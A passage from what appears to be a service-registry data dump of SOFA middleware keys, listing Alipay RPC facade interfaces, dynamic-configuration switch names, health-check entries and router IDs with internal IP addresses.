LT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.approdcenter:name=com.alipay.ap.prodcenter.client.Config.sysEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.facade.api.ClearingCommandConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:EXECUTE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.clear.common.service.facade.InstanceScheduleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.manage.RuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.reply.ReplyFacadeNew:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcshield@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.PrizeSendOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@workflow#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.distinguishprod.common.service.facade.RecImageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.199.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:XIAOGU_BFF@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.iad.facade.SpvQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.StationContactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IZoneMigrateRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.enterTairSwitch4LoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.common.service.facade.operation.OperationPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.query.DatasetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.customerTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.poscoreTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue44#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.prodtrans.senior.manage.facade.GroupManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.promotion.common.service.facade.api.promocode.PromoCodeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:voucherFinacialInfoTaskCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.comparacenter.common.service.facade.DeploymentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinterbankcenter.common.service.facade.api.SuggestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.transport.TransportRecommendTrialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.rule.ReservationRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rinsight.common.base.spi.RiskinsightNotify:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finhadecision.common.service.facade.api.BaseAlertInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.MstSearchGraspResultDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.content.qa.UserMsgQueryApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promobench_workOrderProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.bis.CacheRetrieveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.virtual.VirtualCodeModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.core.model.repository.CampRelateSubjectDetailRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillOweInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.query.api.ClearingChannelApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicIterationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gray:name=com.alipay.grayprod.change.drm.ChangePolicy.consultTaskInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdeduct.common.service.facade.agreement.UsageAgreementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.common.manage.facade.api.union.MerchantUnionOperationEnrollFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprovisioncore.common.facade.project.WorkspaceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaBizOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundWorkDayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.68.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yebplus.common.facade.service.api.yebscene.admin.YebcPrizeAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.defaultError,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.discountcore.common.service.facade.DiscountRefundService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:district_replace_data@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ivostro.facade.api.VirtualAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.TestTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.channelspop.service.solution.event.facade.EventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opencore.service.facade.AppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.olive.facade.api.common.OliveCommonOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.progov.service.api.ProductExcQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.resource.admin.MiniResourceRuleAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.indexEstimateDegrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_1209_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dcepprod.common.service.facade.api.WhiteListUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.core.change.ChgWindowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecbill.common.service.guaranty.GuarantyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstportal.common.service.facade.generator.api.GeneratorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:com.alipay.testTool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendMailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfmreceipt.service.facade.api.QuotaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@719a3ecabf0a#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_100.83.217.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.213.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.forexprod.common.service.facade.ForexSystemParamMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.GlVchrAutoCheckTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zskynet.zskynetDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gclearingcenter.facade.api.GclearingAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobilesrc.facade.PluginOperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstrategycenter.common.service.facade.AlActivityGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.core.engine.service.api.ValidationService:1.0:mfinstockprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_AGDS_TO_ZHIMA_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csmonitor.common.service.facade.HbaseTableServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:infosectask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filebridge.service.facade.FileBridgeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.CtuEventQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.material.MaterialQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeLogisticsQueryFacade:1.0:tradequeryhis@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.246.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirefront.service.facade.api.AcquireOrderCreateAndPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pledgecore.common.service.facade.spi.PledgeAssetConsultService:1.0:zcbprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:mobilelbs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.brand.api.ShopBrandManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.store.external.facade.StoreExternalRzFacade:1.0:${app_name_store_external_rz_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pucprod.common.service.facade.jiaofei.ExternalBillBatchCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.facade.ScorpioManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.MergeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.api.HolidayCalendarQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductService:1.0:zhubplus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.open.facade.OpenTopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.MultiYebIncomeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.EnrollmentOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:lifeprod_propertyQueryCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dacuprod.service.facade.ActivityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.test:name=com.alipay.fc.iriskperceptcenter.rpoints.drm.RpointsCommonConfigResource.processorSlotConfigJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_PAYDECISION_PAYDECISION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.OrpcAccessAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.swiftweb.facade.CubeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.pub.PublicBaseResultManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.ServiceRouteSwitchDrmResoureInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.CodeRouteService:1.0:mobilechat@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.FinnetOutFluxCompatibleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:financeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adbasiclib.ad.rpc.AdService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compass.common.service.facade.api.AccurateTestServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbdish_GRZONE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_createModifyProdCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditrmp.facade.AuthorityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.fpc.common.service.facade.FootprintQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CIManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmcore.common.service.facade.api.MifSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileorderprod.service.api.mng.UserTagSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:argo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.SecurityManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_XAMVC4#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsPriceInquiryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizfund.common.service.facade.control.AccountMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.morderprod:name=com.alipay.morderprod.switch.env,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.i18n.facade.I18nService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:filecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WSOrderRecoveryDRMResource.endTimeIndex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservindustryprod.common.service.facade.backend.TaskModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S_dchainbankloan_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zdataquery.common.service.facade.PaymentQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.ResponseParamManager:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.ReleaseWindowsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyoptprod.common.service.facade.api.journey.JourneyVersionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.antfeature.OpenAntFeatureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.migratedrmhandler.isSaveEventContextOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:secucommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.securitycore.common.service.facade.riskrank.CustomerRiskRankService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.caprod.service.cert.facade.CertCustomizedService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.appservice.AppServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.naegis.service.loan.RepayAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.AccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.communityserving.InsIopCommunityServingMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.clientpublish.drm.ClientPublishDRMImpl.syncMaxRandomTimeDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.solution.MerchantOrderApplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.CooperateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.OrderSyncServiceFacade:1.0:bksigncentre_orderSyncServiceFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sandboxhome:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.137.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbshopdetail.facade.SuperBrandQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightmng.common.service.facade.strategy.api.StrategyTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.log.conf.BizMonLogConfCtrlDrm.digestRepository,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:mnotify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:smartf-smartfProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.moneyfund.facade.api.MFundDepositService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.bxs.BxsAssessAuditFacade:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.merchandise.ShelfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.api.GenericHandlerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antProvacyAuditFacade_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.212.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.common.service.facade.api.outside.futurehotel.InsFutureHotelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuntu.facade.trace.QueryProductCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbordersync.common.service.facade.api.ShopPushChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.57.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintradecenter.common.service.facade.confirm.FintradeConfirmFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.renderweb:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.234.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acccenter.common.service.facade.AblityFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditbill.facade.bill.api.PcreditGeneralBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:stockvirtual#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dt.onedata.dwm.client.smoke.SmokeOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditPollenRecordPraiseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.opscore.common.service.facade.OpsConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.weiboUserRateLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csplatform.service.contact.facade.JiebeiPayDelayUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.biz.rpc.facade.FacePayConditionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grscore.common.service.facade.api.ReqmngBizOutsourceMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:pcreditbatch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@inscvprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.ipay.imemberprod.service.facade.api.ImemberUserCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientExpireDRM.expireRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoguard.common.service.facade.inspection.api.PcTaskOperationRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditauthfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insassetprod.common.service.facade.FundRenewalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.metadata.AttrManageFacade:1.0@DEFAULT